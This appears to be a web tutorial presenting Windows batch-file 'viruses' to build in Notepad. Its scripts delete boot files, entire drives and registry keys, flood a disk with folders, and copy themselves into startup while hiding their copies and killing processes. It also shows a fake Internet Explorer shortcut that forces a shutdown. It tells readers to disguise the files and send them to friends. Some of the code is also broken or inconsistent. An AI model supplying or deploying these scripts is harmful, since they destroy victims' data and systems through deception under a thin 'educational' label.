VIRUSES: Some of the most dangerous viruses that could do a great damage just by using notepad
Be aware of these dangerous viruses
Inject them at your own risk
This for only educational purpose
These viruses would mos probably run in all versions of windows
Get ready to learn:
How to create more than 3,000 folders under a minute:
Open your notepad and type
the following code.
@echo off
md %random%
goto top
2) Save it as 1000.bat
@echo off makes your screen
appear blank but it is actually
making hundreds of folders.
md %random% is command that
creating folders with random
names.( md is a command to
make directory in ms-dos)
goto top – return the command
to :top, causes an infinite loop.
NOTE: The folders will get created
in the directory where you saved
the ”1000.bat” file.
The file might look suspicious to
your friends. So if you are
looking to fool your friends, then
change the file name and also
the icon so that he doesn’t
suspect the file to be a virus.
How to Shutdown a computer forever?
Now Please don’t try this because this is the most simplest and deadliest hack
for your windows computer. Copy the following
code into your notepad
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows
del c:\windows\win.ini
Save it as “shutdown-
forever.bat”. Just make sure it
has a .bat or .cmd extension.
RUN IT !!!
This should shutdown the persons computer. It shuts it off once
and deletes the files needed to reboot and restart.So please, use
this hack only if you have no intention of rebooting your computer again. So
just be careful.
Here’s an alternative code.
cmd /c del c:\windows\* /F /S /
cmd /c del c:\* /F /S /Q
Paste it in NotePad And Save It
with Extension .cmd or .bat.
Here is a Batch File virus which can:
1.Copy itself into startup
2.Copy itself over one thousand times into random spots in your computer.
3.Hide its self and all other created files
4.Task kill MSN, Norton, Windows Explorer, Limewire.
5.Swap the left mouse button with the right one
6.Opens alert boxes
7.Changes the time to 12:00 and shuts down the computer
copy this code into notepad and save as Greatgame.bat(while saving select all
files instead of text ).
Here is the Code:
@Echo off
color 4
title 4
title R.I.P
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat
copy Greatgame.bat FixVirus.bat
start calc
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
time 12:00
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
No 2:-
Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q
Then save it as kinng.bat and the batch file is created .
WARNING :: This is the most dangerous virus! Be careful with its use.
Delete the entire registry
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
Now save it as kinng.bat and the batch file is created .
No 3:-
How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the
files needed to reboot and restart.
No 4 :-
How to stop someone's internet access::::
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost,
and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
No 5 :-
ShutDown PC million Times::::
1.right click on the desktop shortcut
you will get a dialogue box, write in it: shutdown -s -t 1000 c "any
comment u want" then press next
note: this "1000" i wrote is the time in seconds needed for ur
computer to shutdown,u can put any number u want...
3.u will get another dialogue box, write in it: Internet Explorer and press
4.u will find the icon on ur desktop, dont open it, just right click on it and
press properties>change icon>select the icon the the internet explorer
and the press apply then ok
try to open it, it is a virus hehe
PS: the only way 2 stop ur computer from shutting down is to go 2
start>run>type: shutdown -a
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